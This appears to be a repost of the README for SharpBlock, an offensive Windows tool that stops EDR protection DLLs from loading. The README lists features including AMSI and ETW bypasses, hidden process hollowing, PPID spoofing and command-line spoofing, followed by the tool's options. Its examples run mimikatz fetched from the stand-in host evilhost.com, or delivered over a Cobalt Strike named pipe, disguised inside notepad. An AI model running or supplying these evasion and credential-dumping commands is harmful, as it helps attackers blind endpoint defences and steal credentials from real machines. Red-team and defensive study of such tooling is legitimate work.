SharpBlock: method of bypassing EDR’s active projection DLL’s
SharpBlock
A method of bypassing EDR’s active projection DLL’s by preventing entry point execution.
Features
- Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
- Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
- Host process that is replaced with an implant PE that can be loaded from disk, HTTP, or named pipe (Cobalt Strike)
- The implanted process is hidden to help evade scanners looking for hollowed processes.
- Command-line args are spoofed and implanted after process creation using the stealthy EDR detection method.
- Patchless ETW bypass.
- Blocks NtProtectVirtualMemory invocation when the callee is within the range of a blocked DLL’s address space
Option
SharpBlock by @_EthicalChaos_
DLL Blocking app for child processes x64-e, –exe=VALUE Program to execute (default cmd.exe)
-a, –args=VALUE Arguments for program (default null)
-n, –name=VALUE Name of DLL to block
-c, –copyright=VALUE Copyright string to block
-p, –product=VALUE Product string to block
-d, –description=VALUE Description string to block
-s, –spawn=VALUE Host process to spawn for swapping with the target exe
-ppid=VALUE Parent process ID for spawned child (PPID Spoofing)
-w, –show Show the lauched process window instead of the
default hide
–disable-bypass-amsi Disable AMSI bypassAmsi
–disable-bypass-cmdline
Disable command line bypass
–disable-bypass-etw Disable ETW bypass
–disable-header-patch Disable process hollow detection bypass
-h, –help Display this help
Example
Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike’s DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d “Active Protection DLL for SylantStrike” -a coffee
Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike’s DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d “Active Protection DLL for SylantStrike” -a coffee upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi
Note, for the upload_file beacon command, load upload.cna into Cobalt Strike’s Script Manager
